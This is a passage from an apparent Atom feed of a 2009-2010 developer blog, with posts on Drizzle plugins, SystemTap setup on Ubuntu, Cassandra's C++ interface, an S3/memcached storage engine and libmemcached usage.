representation of a query would seem like a natural thing to pass to a query rewriter plugin since
the plugin would not have to implement its own parser then. However, the parsed representation of a
query in Drizzle is not the easiest in the world to deal with right now so passing this to a plugin
would make developing a rewriting plugin quite difficult. Thus, I made the decision to create the
plugin point before parsing occurs.
&lt;br&gt;

This means that if a
plugin developer wants to do some complex rewriting, they may need to parse the query in their
plugin. It may not be ideal but it does make the plugin API for query rewriting quite simple and opens
up a lot of interesting opportunities.
&lt;br&gt;

Following the lead of other plugin interfaces such as the replication API developed by &lt;a
href=&quot;http://jpipes.com&quot;&gt;Jay&lt;/a&gt;, I wanted to keep it as simple and easy to understand as possible.
With that in mind, here is the entire API for a query rewriting plugin:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/301690.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

Thus, all a plugin developer needs to do is implement the rewrite() function within their plugin.
The query is passed by reference as a std::string so a plugin can do whatever it likes to this
string and this string will then be passed to the parser in the Drizzle core kernel for parsing.
&lt;br&gt;

This interface opens up a lot of possibilities for interesting plugins. For example, one could
develop a plugin to analyze a query for common SQL injection patterns, or a plugin to rewrite
a query based on a set of rules. I would be really interested in hearing what ideas people reading
this have for plugins that use this interface.
&lt;br&gt;

</content>
 </entry>
 
 <entry>
   <title>Installing SystemTap on Ubuntu</title>
   <link href="http://posulliv.github.com/2010/02/26/installing-stap"/>
   <updated>2010-02-26T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/02/26/installing-stap</id>
   <content type="html">I'm presenting at the MySQL user's conference this year and one of my &lt;a
href=&quot;http://en.oreilly.com/mysql2010/public/schedule/detail/12472&quot;&gt;talks&lt;/a&gt; is on using SystemTap and DTrace
with MySQL and Drizzle. I'm also doing a tutorial with &lt;a href=&quot;http://jpipes.com&quot;&gt;Jay Pipes&lt;/a&gt; on
developing replication plugins for Drizzle and that should be a lot of fun.
&lt;br&gt;

I wanted to write some posts before the conference that I can reference
within my talk which detail how to install &lt;a href=&quot;http://sourceware.org/systemtap/&quot;&gt;SystemTap&lt;/a&gt; and configure Drizzle and MySQL for use with
SystemTap. Thus, this post is on how to install SystemTap on Ubuntu while my next post
will go in to details about how to configure MySQL and Drizzle for use with SystemTap.
&lt;br&gt;

Before starting, it's worth noting that this post is specific to Ubuntu 9.10. The procedure to follow
may be different on other versions, so it's worth keeping that in mind. The first thing we do is
install systemtap and some associated packages which will be needed by Drizzle and MySQL:

&lt;pre&gt;
$ sudo apt-get install systemtap
$ sudo apt-get install systemtap-sdt-dev
&lt;/pre&gt;

Now, being used to Ubuntu, you would think you are good to go. Unfortunately, attempting to run
SystemTap will probably give you the following error:

&lt;pre&gt;
$ stap -e 'probe kernel.function(&quot;sys_open&quot;) {log(&quot;hello world&quot;) exit()}'
semantic error: libdwfl failure (missing x86_64 kernel/module debuginfo under
'/lib/modules/2.6.31-19-generic/build'): No such file or directory while resolving probe point
kernel.function(&quot;sys_open&quot;)
semantic error: no probes found
Pass 2: analysis failed.  Try again with another '--vp 01' option.
$
&lt;/pre&gt;

The above error occurs because SystemTap needs to have a debug version of the kernel available.
Unfortunately, installing the debug information for a kernel on Ubuntu is not a trivial operation to
perform. In fact, there is a &lt;a
href=&quot;https://bugs.launchpad.net/ubuntu/+source/linux/+bug/289087&quot;&gt;bug&lt;/a&gt; on Launchpad about this
issue. Thus, we will build a kernel debug package from source ourselves. This can be done as
follows:

&lt;pre&gt;
$ cd $HOME
$ sudo apt-get install dpkg-dev debhelper gawk
$ mkdir tmp
$ cd tmp
$ sudo apt-get build-dep --no-install-recommends linux-image-$(uname -r)
$ apt-get source linux-image-$(uname -r)
$ cd linux-2.6.31  # this is currently the kernel version of 9.10
$ fakeroot debian/rules clean
$ AUTOBUILD=1 fakeroot debian/rules binary-generic skipdbg=false
$ sudo dpkg -i ../linux-image-debug-2.6.31-19-generic_2.6.31-19.56_amd64.ddeb
&lt;/pre&gt;

This builds a debug image of the kernel and so will take quite a while. Once we have the above
completed, we can try running our hello world example with SystemTap again. In order to get some
output, you should open or create some file on the system in another terminal window. In this
example, I backgrounded the stap process and created a file:

&lt;pre&gt;
$ sudo stap -e 'probe kernel.function(&quot;sys_open&quot;) {log(&quot;hello world&quot;) exit()}' &amp;
[1] 951
$ touch /tmp/padraig
$ hello world
$ [1]+ Done
&lt;/pre&gt;

Installing SystemTap on CentOS is significantly easier since it is primarily developed by Red Hat. A
good article on how to install it on CentOS is available &lt;a
href=&quot;http://sourceware.org/systemtap/wiki/SystemTapOnCentOS&quot;&gt;here&lt;/a&gt;. 
&lt;br&gt;

In my next post on the topic, I'll explain how to configure MySQL and Drizzle for SystemTap and give
some simple examples of using SystemTap with them.
</content>
 </entry>
 
 <entry>
   <title>Using the C++ Interface with Cassandra</title>
   <link href="http://posulliv.github.com/2010/02/22/cpp-cassandra"/>
   <updated>2010-02-22T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/02/22/cpp-cassandra</id>
   <content type="html">Before starting, Cassandra needs to be downladed and installed. In a &lt;a
href=&quot;http://posulliv.github.com/2009/09/07/building-a-small-cassandra-cluster-for-testing-and-development.html&quot;&gt;previous post&lt;/a&gt;, I
went through the steps involved in setting up a Cassandra cluster so I'm not going to repeat that
here. For this simple example though, I'll be using the following keyspace (which needs to be
present in the storage-conf.xml file):&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/311823.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

Once we have cassandra installed and running, we next need to download thrift from its &lt;a
href=&quot;http://incubator.apache.org/thrift/&quot;&gt;Apache
homepage&lt;/a&gt;. I went with the latest stable release, which at the
time of writing is 0.2.0. Installation from the tarball is pretty straightforward, but be sure to run
ldconfig after installing thrift.&lt;br&gt;
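
For completeness, installing from the tarball is the usual autotools sequence (the tarball name
assumes the 0.2.0 release mentioned above; the default /usr/local prefix is why ldconfig is
needed):

&lt;pre&gt;
$ tar zxvf thrift-0.2.0.tar.gz
$ cd thrift-0.2.0
$ ./configure
$ make
$ sudo make install
$ sudo ldconfig
&lt;/pre&gt;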

Once thrift is installed, we need to generate the C++ interface for Cassandra (this will be done as
the cassandra user if following the setup in my previous post):

&lt;pre&gt;
$ cd $CASSANDRA_HOME/interface
$ thrift --gen cpp cassandra.thrift
$ ls -ltr
total 44
drwxr-xr-x 3 cassandra cassandra  4096 2010-02-22 17:57 thrift
-rw-r--r-- 1 cassandra cassandra 21105 2010-02-22 17:57 cassandra.thrift
-rw-r--r-- 1 cassandra cassandra  3359 2010-02-22 17:57 cassandra.avpr
drwxr-xr-x 3 cassandra cassandra  4096 2010-02-22 18:01 avro
drwxr-xr-x 2 cassandra cassandra  4096 2010-02-22 21:41 gen-cpp
$ mkdir cpp-test
&lt;/pre&gt;

Within the cpp-test directory, I'm going to create a file named simple-test.cc which looks like:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/311827.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

To compile this, I used the following command line (assuming I am in the cpp-test directory):

&lt;pre&gt;
$ g++ -o cpptest -Wall -g \
&gt; -I../gen-cpp/. \
&gt; -I/usr/local/include/thrift \
&gt; -L/usr/local/lib -lstdc++ -lthrift \
&gt; simple-test.cc \
&gt; ../gen-cpp/cassandra_constants.cpp \
&gt; ../gen-cpp/cassandra_types.cpp \
&gt; ../gen-cpp/Cassandra.cpp
$
&lt;/pre&gt;

The above command will produce an executable named cpptest in the cpp-test directory. Assuming
cassandra is started, we run the binary and should obtain output like so:

&lt;pre&gt;
$ ./cpptest 
Column name retrieved is: second
Value in column retrieved is: this is data!!
$
&lt;/pre&gt;

That's a simple example of using the C++ interface to Cassandra. Hopefully, this will prove useful
to someone but it took me longer than expected to get the above simple test working so I figured it
was worth writing up the steps I went through.
</content>
 </entry>
 
 <entry>
   <title>New Job at Akiban</title>
   <link href="http://posulliv.github.com/2010/02/06/new-job-at-akiban"/>
   <updated>2010-02-06T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/02/06/new-job-at-akiban</id>
   <content type="html">&lt;p&gt;I just finished my first week at my new position as a software engineer at &lt;a href='http://akiban.com'&gt;Akiban Technologies&lt;/a&gt; in Boston.&lt;/p&gt;

&lt;p&gt;I&amp;#8217;m really excited about working here. Akiban is a small startup developing some really cool technology that I believe will get people talking about the relational model in a good way again. We are currently based in the South End of Boston. The building where we are located is pretty awesome and not at all what I pictured an office to be like. There is a resident artist in the building who hangs his paintings on the walls and they seem to move to different places at random times. Its a strange feeling to walk in to work in the morning and smell fresh paint as I go to my desk. Definitely not something I expected!&lt;/p&gt;

&lt;p&gt;But besides all that, one of the best things for me about working here is that I get paid to contribute to open source. I&amp;#8217;ve been pretty involved with Drizzle for the last year while still a student and it was always something I really enjoyed which I never thought someone would pay me to work on. The community around the project is awesome and I was just happy to be involved with it. Now that I get paid to contribute, it&amp;#8217;s nice to know that I can still be part of that community without having to worry about how I&amp;#8217;m going to make a living. It&amp;#8217;s weird to be paid for something that I would still be doing anyway without the pay! I&amp;#8217;m not complaining though, it&amp;#8217;s a nice change!&lt;/p&gt;

&lt;p&gt;I&amp;#8217;ll be presenting at the MySQL conference in April, lots of awesome work is happening in the Drizzle project and Akiban will be out of stealth mode by the conference so there are some exciting times ahead!&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Moved to GitHub Pages</title>
   <link href="http://posulliv.github.com/2010/01/28/github-move"/>
   <updated>2010-01-28T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/01/28/github-move</id>
   <content type="html">I decided to move my blog to a new hosting provider - &lt;a href=&quot;http://github.com/blog/272-github-pages&quot;&gt;GitHub Pages&lt;/a&gt;. The blogging software used with GitHub is &lt;a href=&quot;http://github.com/mojombo/jekyll/tree/master&quot;&gt;Jekyll&lt;/a&gt;.&lt;br&gt;

I really like the fact that everything is done via a &lt;a href=&quot;http://git-scm.com/&quot;&gt;git&lt;/a&gt; repository. So far, I really like this setup.
</content>
 </entry>
 
 <entry>
   <title>S3 Storage Engine with Memcached in Drizzle</title>
   <link href="http://posulliv.github.com/2009/11/09/s3-storage-engine-with-memcached-in-drizzle"/>
   <updated>2009-11-09T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2009/11/09/s3-storage-engine-with-memcached-in-drizzle</id>
   <content type="html">Previously, I had ported Brian's &lt;a href=&quot;http://tangent.org/506/memcache_engine.html&quot;&gt;memcached engine&lt;/a&gt; to Drizzle and rencently, I've been doing some work with Amazon's S3 for school. Thus, I decided to have a look at Mark's &lt;a href=&quot;http://fallenpegasus.com/code/mysql-awss3/&quot;&gt;S3 storage engine&lt;/a&gt; for MySQL. Over the last 2 days, I created a new version of the S3 storage engine for Drizzle with the option to use &lt;a href=&quot;http://memcached.org/&quot;&gt;Memcached&lt;/a&gt; as a write-through cache for the S3 backend store. I see this work more as showing the cool things we can do in Drizzle and how quickly we can get prototypes up and running. I don't even know if this is a good idea or anything but its cool to be able to store all data in S3.&lt;br&gt;

First, let's see how to create a table with this engine. The one constraint on tables created with this engine is that they need to have a primary key specified. Each table created with this engine is represented as a bucket in S3, so whenever you create a table, you create a bucket. Let's try creating a table:

&lt;pre&gt;
drizzle&gt; create database demo;
Query OK, 1 row affected (0 sec)

drizzle&gt; use demo;
Database changed
drizzle&gt; create table padara (
    -&gt; a int primary key,
    -&gt; b varchar(255),
    -&gt; c varchar(255)) engine=mcaws;
ERROR 1005 (HY000): Can't create table 'demo.padara' (errno: 1005)
drizzle&gt;
&lt;/pre&gt;

Let's get some more information on why that table creation failed:

&lt;pre&gt;
drizzle&gt; show warnings;
+-------+------+-------------------------------------------------------------------------------------+
| Level | Code | Message                                                                             |
+-------+------+-------------------------------------------------------------------------------------+
| Error | 1005 | Amazon S3 Connection Pool has not been created (Did you specify your credentials?)
 |
| Error | 1005 | Can't create table 'demo.padara' (errno: 1005)                                      |
+-------+------+-------------------------------------------------------------------------------------+
2 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

As you can see, we need to specify our Amazon AWS access credentials before we can use this storage engine. For the moment, I have the following system variables associated with this plugin:

&lt;pre&gt;
drizzle&gt; show variables like '%AWS%';
+-----------------------+-------+
| Variable_name         | Value |
+-----------------------+-------+
| mcaws_accesskey       |       |
| mcaws_mcservers       |       |
| mcaws_secretaccesskey |       |
+-----------------------+-------+
3 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

So I set the AWS access credentials by setting the appropriate system variables (this has to be done before tables can be created with this engine and in this order):

&lt;pre&gt;
drizzle&gt; set global mcaws_accesskey = 'YOUR_ACCESS_KEY';
Query OK, 0 rows affected (0 sec)

drizzle&gt; set global mcaws_secretaccesskey = 'YOUR_SECRET_ACCESS_KEY';
Query OK, 0 rows affected (0 sec)

drizzle&gt; show variables like '%AWS%';
+-----------------------+------------------------------------------+
| Variable_name         | Value                                    |
+-----------------------+------------------------------------------+
| mcaws_accesskey       | YOUR_ACCESS_KEY                     |
| mcaws_mcservers       |                                          |
| mcaws_secretaccesskey | YOUR_SECRET_ACCESS_KEY |
+-----------------------+------------------------------------------+
3 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

Before creating the table, let's look at what buckets are associated with my S3 account. I'm going to use the &lt;a href=&quot;http://www.s3fox.net/&quot;&gt;S3Fox&lt;/a&gt; firefox plugin for this (there are multiple other tools you could use). Here are the buckets in my S3 account right now:&lt;br&gt;

&lt;img class=&quot;aligncenter size-medium&quot; src=&quot;../../../images/s3fox.png&quot; alt=&quot;&quot; width=&quot;300&quot; height=&quot;270&quot; /&gt;&lt;br&gt;

I just have the one bucket for now. Now, I create a table using the S3 engine after specifying my AWS credentials:

&lt;pre&gt;
drizzle&gt; create table padara (
    -&gt; a int primary key,
    -&gt; b varchar(255),
    -&gt; c varchar(255)) engine=mcaws;
Query OK, 0 rows affected (0.31 sec)

drizzle&gt;
&lt;/pre&gt;

and when I look at my buckets in S3, I should see a new bucket representing the new table I created:&lt;br&gt;

&lt;img class=&quot;aligncenter size-medium&quot; src=&quot;../../../images/s3foxafter.png&quot; alt=&quot;&quot; width=&quot;300&quot; height=&quot;270&quot; /&gt;&lt;br&gt;

As can be seen, the bucket name is the database name concatenated with the table name - 'databasetable'. Next, let's insert some rows into the table and then see what objects are in the bucket:

&lt;pre&gt;
drizzle&gt; insert into padara
    -&gt; values (1, 'padraig', 'sullivan');
Query OK, 1 row affected (0.07 sec)

drizzle&gt; insert into padara
    -&gt; values (2, 'domhnall', 'sullivan');
Query OK, 1 row affected (0.08 sec)

drizzle&gt; insert into padara
    -&gt; values (3, 'tomas', 'sullivan');
Query OK, 1 row affected (0.14 sec)

drizzle&gt;
&lt;/pre&gt;

&lt;img class=&quot;aligncenter size-medium&quot; src=&quot;../../../images/s3foxobjects.png&quot; alt=&quot;&quot; width=&quot;300&quot; height=&quot;270&quot; /&gt;&lt;br&gt;

Now we can query the table. Queries on the table need to specify a primary key value in the WHERE clause for now so we will just be returning one row (I'll be looking into range queries pretty soon):

&lt;pre&gt;
drizzle&gt; select *
    -&gt; from padara
    -&gt; where a = 2;
+---+----------+----------+
| a | b        | c        |
+---+----------+----------+
| 2 | domhnall | sullivan |
+---+----------+----------+
1 row in set (5 sec)

drizzle&gt;
&lt;/pre&gt;

That's basically the simple S3 engine. It works just like a regular storage engine except the data is stored on S3. Of course, the latency involved in interacting with S3 for every request can be quite limiting. For example, the simple query above took 5 seconds to retrieve the data. Thus, I added support for using memcached as a write-through cache for this engine. All we need to do is specify the memcached servers to use in the appropriate system variable:

&lt;pre&gt;
drizzle&gt; set global mcaws_mcservers = 'localhost:19191';
Query OK, 0 rows affected (0 sec)

drizzle&gt;
&lt;/pre&gt;

Now, whenever we query a table created in this engine, we will check for the data in memcached first and if we miss in the cache, only then do we go to S3 for the data. When inserting new data, we insert it in both memcached and S3. Using memcached for this engine is totally optional. It can simply be used as a way to store data in S3 through the engine interface but I thought it might prove to be a useful option for an engine like this.&lt;br&gt;

I wanted to show how clean the code that implements this functionality in the plugin is. This goes to show the benefit of the great build system Monty Taylor has put a lot of work into in Drizzle. I can easily utilize external libraries in my plugin - in this case &lt;a href=&quot;https://launchpad.net/libmemcached&quot;&gt;libmemcached&lt;/a&gt; and &lt;a href=&quot;http://aws.28msec.com/&quot;&gt;libaws&lt;/a&gt;. The code below first checks for data in memcached and, if it is not present there, retrieves the data from S3 and updates memcached before returning to the engine.&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/230509.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

So that's about it for now. In the future, there are a few things I plan on working on for this engine:
&lt;ul&gt;
	&lt;li&gt;removing the need to have a table represented as a bucket in S3 (this design makes the code much simpler for now)&lt;/li&gt;
	&lt;li&gt;increasing the size of the objects transferred from/to S3 - making the unit of transfer between the engine and S3 a page instead of a row as it is now&lt;/li&gt;
	&lt;li&gt;creating I_S tables for monitoring S3 usage&lt;/li&gt;
	&lt;li&gt;adding support for range queries&lt;/li&gt;
	&lt;li&gt;removing the need for a table to have a primary key&lt;/li&gt;
&lt;/ul&gt;
If you are interested in downloading the branch and playing with it, you can get it and build it by:

&lt;pre&gt;
$ bzr branch lp:~posulliv/drizzle/aws-mc-engine
$ cd aws-mc-engine
$ ./config/autorun.sh &amp;&amp; ./configure &amp;&amp; make
&lt;/pre&gt;

libmemcached and libaws are prerequisites that you will need installed before compiling this plugin.

If anyone has any feedback or suggestions on what to do with this, that would be awesome. I really have no idea what to do with it!
</content>
 </entry>
 
 <entry>
   <title>Viewing Memcached Statistics from Drizzle</title>
   <link href="http://posulliv.github.com/2009/09/29/viewing-memcached-statistics-from-drizzle"/>
   <updated>2009-09-29T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/09/29/viewing-memcached-statistics-from-drizzle</id>
   <content type="html">While working on a few memcached related plugins for Drizzle, I noticed that it would be nice to have the ability to query memcached statistics from an INFORMATION_SCHEMA table. Today I put together a plugin that adds 2 memcached related I_S tables to drizzle.

First, let's see the tables the plugin adds to drizzle along with the columns in each table:
&lt;pre&gt;
drizzle&amp;gt; select table_name
    -&amp;gt; from information_schema.tables
    -&amp;gt; where table_name like '%MEMCACHED%';
+--------------------+
| table_name         |
+--------------------+
| MEMCACHED_STATS    | 
| MEMCACHED_ANALYSIS | 
+--------------------+
2 rows in set (0 sec)

drizzle&amp;gt; desc information_schema.memcached_stats;
+-----------------------+-------------+------+-----+---------+-------+
| Field                 | Type        | Null | Key | Default | Extra |
+-----------------------+-------------+------+-----+---------+-------+
| NAME                  | varchar(32) | NO   |     |         |       | 
| PORT_NUMBER           | bigint      | NO   |     | 0       |       | 
| PROCESS_ID            | bigint      | NO   |     | 0       |       | 
| UPTIME                | bigint      | NO   |     | 0       |       | 
| TIME                  | bigint      | NO   |     | 0       |       | 
| VERSION               | varchar(8)  | NO   |     |         |       | 
| POINTER_SIZE          | bigint      | NO   |     | 0       |       | 
| RUSAGE_USER           | bigint      | NO   |     | 0       |       | 
| RUSAGE_SYSTEM         | bigint      | NO   |     | 0       |       | 
| CURRENT_ITEMS         | bigint      | NO   |     | 0       |       | 
| TOTAL_ITEMS           | bigint      | NO   |     | 0       |       | 
| BYTES                 | bigint      | NO   |     | 0       |       | 
| CURRENT_CONNECTIONS   | bigint      | NO   |     | 0       |       | 
| TOTAL_CONNECTIONS     | bigint      | NO   |     | 0       |       | 
| CONNECTION_STRUCTURES | bigint      | NO   |     | 0       |       | 
| GETS                  | bigint      | NO   |     | 0       |       | 
| SETS                  | bigint      | NO   |     | 0       |       | 
| HITS                  | bigint      | NO   |     | 0       |       | 
| MISSES                | bigint      | NO   |     | 0       |       | 
| EVICTIONS             | bigint      | NO   |     | 0       |       | 
| BYTES_READ            | bigint      | NO   |     | 0       |       | 
| BYTES_WRITTEN         | bigint      | NO   |     | 0       |       | 
| LIMIT_MAXBYTES        | bigint      | NO   |     | 0       |       | 
| THREADS               | bigint      | NO   |     | 0       |       | 
+-----------------------+-------------+------+-----+---------+-------+
24 rows in set (0 sec)

drizzle&amp;gt; desc information_schema.memcached_analysis;
+--------------------------------+-------------+------+-----+---------+-------+
| Field                          | Type        | Null | Key | Default | Extra |
+--------------------------------+-------------+------+-----+---------+-------+
| SERVERS_ANALYZED               | bigint      | NO   |     | 0       |       | 
| AVERAGE_ITEM_SIZE              | bigint      | NO   |     | 0       |       | 
| NODE_WITH_MOST_MEM_CONSUMPTION | varchar(32) | NO   |     |         |       | 
| USED_BYTES                     | bigint      | NO   |     | 0       |       | 
| NODE_WITH_LEAST_FREE_SPACE     | varchar(32) | NO   |     |         |       | 
| FREE_BYTES                     | bigint      | NO   |     | 0       |       | 
| NODE_WITH_LONGEST_UPTIME       | varchar(32) | NO   |     |         |       | 
| LONGEST_UPTIME                 | bigint      | NO   |     | 0       |       | 
| POOL_WIDE_HIT_RATIO            | bigint      | NO   |     | 0       |       | 
+--------------------------------+-------------+------+-----+---------+-------+
9 rows in set (0.01 sec)

drizzle&amp;gt; 
&lt;/pre&gt;

You might wonder how you specify the memcached servers to obtain statistics on. Well, I created a system variable for that purpose:
&lt;pre&gt;
drizzle&amp;gt; show variables like '%memcached%';
+-------------------------+-------+
| Variable_name           | Value |
+-------------------------+-------+
| memcached_stats_servers |       | 
+-------------------------+-------+
1 row in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

Now, let's point the system variable at a small memcached instance I have running on my laptop:
&lt;pre&gt;
drizzle&amp;gt; set global memcached_stats_servers = 'localhost:11211';
Query OK, 0 rows affected (0 sec)

drizzle&amp;gt; show variables like '%memcached%';
+-------------------------+-----------------+
| Variable_name           | Value           |
+-------------------------+-----------------+
| memcached_stats_servers | localhost:11211 | 
+-------------------------+-----------------+
1 row in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

And let's run a simple query on the MEMCACHED_STATS table:

&lt;pre&gt;
drizzle&amp;gt; select name, port_number, version, gets, sets, hits, misses
    -&amp;gt; from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
+----------------------------------+-------------+----------+------+------+------+--------+
1 row in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

The MEMCACHED_ANALYSIS table is not interesting unless there is more than one memcached server specified in the system variable, so we need to update that system variable first:
&lt;pre&gt;
drizzle&amp;gt; set global memcached_stats_servers = 'localhost:11211, localhost:11212';
Query OK, 0 rows affected (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

Now, let's run the same query on MEMCACHED_STATS again:
&lt;pre&gt;
drizzle&amp;gt; select name, port_number, version, gets, sets, hits, misses from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
| localhost                        |       11212 | 1.2.6    |    0 |    0 |    0 |      0 | 
+----------------------------------+-------------+----------+------+------+------+--------+
2 rows in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

So you can see that for each server you specify in the system variable, a row will be output in the table. Now I'm going to make some activity happen in the second memcached instance I just started on my machine. Another branch I created over the last few days is a port of &lt;a href=&quot;http://krow.livejournal.com/&quot;&gt;Brian&lt;/a&gt;'s &lt;a href=&quot;http://tangent.org/506/memcache_engine.html&quot;&gt;memcached engine&lt;/a&gt; to drizzle, so I'm going to create a table using the memcached engine and then insert some data into it:

&lt;pre&gt;
drizzle&amp;gt; create table test_data (
    -&amp;gt; a int primary key,
    -&amp;gt; b int,
    -&amp;gt; c varchar(64))
    -&amp;gt; engine=memcached;
Query OK, 0 rows affected (0.01 sec)

drizzle&amp;gt; insert into test_data
    -&amp;gt; values (1, 2, &quot;this will be stored in memcached&quot;);
Query OK, 1 row affected (0.01 sec)

drizzle&amp;gt; select b, c 
    -&amp;gt; from test_data
    -&amp;gt; where a = 1;
+------+----------------------------------+
| b    | c                                |
+------+----------------------------------+
|    2 | this will be stored in memcached | 
+------+----------------------------------+
1 row in set (0 sec)

drizzle&amp;gt; select b, c  from test_data where a = 2;
Empty set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

Now, let's query the statistics again:

&lt;pre&gt;
drizzle&amp;gt; select name, port_number, version, gets, sets, hits, misses from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
| localhost                        |       11212 | 1.2.6    |    2 |    1 |    1 |      1 | 
+----------------------------------+-------------+----------+------+------+------+--------+
2 rows in set (0.01 sec)

drizzle&amp;gt;
&lt;/pre&gt;

And we can see they have been updated as expected. Now, let's look at the MEMCACHED_ANALYSIS table. I'm just going to query the first two columns of this table:
&lt;pre&gt;
drizzle&amp;gt; select servers_analyzed, average_item_size
    -&amp;gt; from information_schema.memcached_analysis;
+------------------+-------------------+
| servers_analyzed | average_item_size |
+------------------+-------------------+
|                2 |                86 | 
+------------------+-------------------+
1 row in set (0 sec)

drizzle&amp;gt;
&lt;/pre&gt;

There will always just be one row in the output from this table. It essentially mimics the functionality of the memstat client utility in libmemcached.
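
If you are curious how statistics like these can be pulled from libmemcached, the following standalone sketch uses libmemcached's C stats API. It is only an illustration of the API, not the plugin's actual code:

&lt;pre&gt;
#include &lt;libmemcached/memcached.h&gt;
#include &lt;cstdio&gt;
#include &lt;cstdlib&gt;

int main()
{
  memcached_st *memc= memcached_create(NULL);
  memcached_server_st *servers=
    memcached_servers_parse(&quot;localhost:11211, localhost:11212&quot;);
  memcached_server_push(memc, servers);

  memcached_return rc;
  /* one memcached_stat_st per server in the list */
  memcached_stat_st *stats= memcached_stat(memc, NULL, &amp;rc);

  for (uint32_t x= 0; x &lt; memcached_server_count(memc); x++)
  {
    /* each stat key corresponds to a column in MEMCACHED_STATS */
    char *version= memcached_stat_get_value(memc, &amp;stats[x], &quot;version&quot;, &amp;rc);
    char *gets= memcached_stat_get_value(memc, &amp;stats[x], &quot;cmd_get&quot;, &amp;rc);
    printf(&quot;server %u: version=%s gets=%s\n&quot;, x, version, gets);
    free(version);
    free(gets);
  }

  memcached_stat_free(memc, stats);
  memcached_server_list_free(servers);
  memcached_free(memc);
  return 0;
}
&lt;/pre&gt;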

I'm not too sure what to do with this patch at the moment. If people are interested, I can propose it for merging into Drizzle so that it will be available as a plugin.
</content>
 </entry>
 
 <entry>
   <title>Using Memcached with C++</title>
   <link href="http://posulliv.github.com/2009/09/19/using-memcached-with-c"/>
   <updated>2009-09-19T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/09/19/using-memcached-with-c</id>
   <content type="html">For some plugins I am working on for &lt;a href=&quot;http://www.drizzle.org/&quot;&gt;Drizzle&lt;/a&gt;, I am using the &lt;a href=&quot;https://launchpad.net/libmemcached&quot;&gt;libmemcached API&lt;/a&gt;. However, the C++ interface for libmemcached was quite simple and not really C++ so we have updated it a little bit in the last few months since drizzle is written in C++ and it would be nice to use a more C++-like interface in libmemcached. In this post, I'll show some simple sample usage of the libmemcached C++ interface based on &lt;a href=&quot;http://sacharya.com/using-memcached-with-java/&quot;&gt;this article&lt;/a&gt; about using memcached with Java. Please note that not all this functionality is in the latest stable version of libmemcached but it will likely be in the next release.

&lt;h3&gt;Installation&lt;/h3&gt;
I am going to assume that memcached is already installed (see &lt;a href=&quot;http://blog.ajohnstone.com/archives/installing-memcached/&quot;&gt;here&lt;/a&gt; for a good guide to installing it). To get libmemcached, we can either obtain the latest source from launchpad, download an RPM, or download a tarball of the latest stable release and build that. I'm going to go with downloading a tarball since not everyone will have bzr installed. The latest stable release can be obtained from &lt;a href=&quot;http://tangent.org/552/libmemcached.html&quot;&gt;here&lt;/a&gt;.

&lt;pre&gt;
$ tar xzf libmemcached-0.32.tar.gz
$ cd libmemcached-0.32
$ ./configure
$ make
$ sudo make install
$ sudo ldconfig
&lt;/pre&gt;

&lt;h3&gt;Basic Usage&lt;/h3&gt;
The API is very similar to the C API except more suited to C++. Some simple examples of constructing a memcached client are shown:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/189562.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

There are many more methods available than the three listed above, but for most simple applications those three should get you pretty far. We still need to add documentation for the C++ interface, which should also be included in the next stable release of libmemcached.
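
To make this concrete, here is roughly what basic usage looks like with the updated interface. Since, as noted above, not all of this has made it into a stable release yet, treat the constructor and method signatures as an approximation of the development branch rather than a fixed API:

&lt;pre&gt;
#include &lt;libmemcached/memcached.hpp&gt;
#include &lt;string&gt;
#include &lt;vector&gt;

int main()
{
  /* connect to a single memcached server */
  memcache::Memcache client(&quot;localhost&quot;, 11211);

  std::string payload(&quot;cached value&quot;);
  std::vector&lt;char&gt; value(payload.begin(), payload.end());

  /* expiration= 0 (never expires), flags= 0 */
  client.set(&quot;my_key&quot;, value, 0, 0);

  std::vector&lt;char&gt; fetched;
  client.get(&quot;my_key&quot;, fetched);

  client.remove(&quot;my_key&quot;);
  return 0;
}
&lt;/pre&gt;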

&lt;h3&gt;MyCache Singleton&lt;/h3&gt;
As done in the Java article, I create a wrapper around the memcached client like so:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/189520.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

The DeletePtrs class is simply a generic function object that deletes the pointers in an STL container. I use this to delete all the Memcache objects in the vector before it is destroyed to ensure I don't have a memory leak (have a look at item 7 in Meyers' Effective STL for more information).
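
For reference, a generic delete-pointers function object along these lines takes only a few lines of C++ (a sketch; the version in the gist may differ slightly):

&lt;pre&gt;
#include &lt;algorithm&gt;
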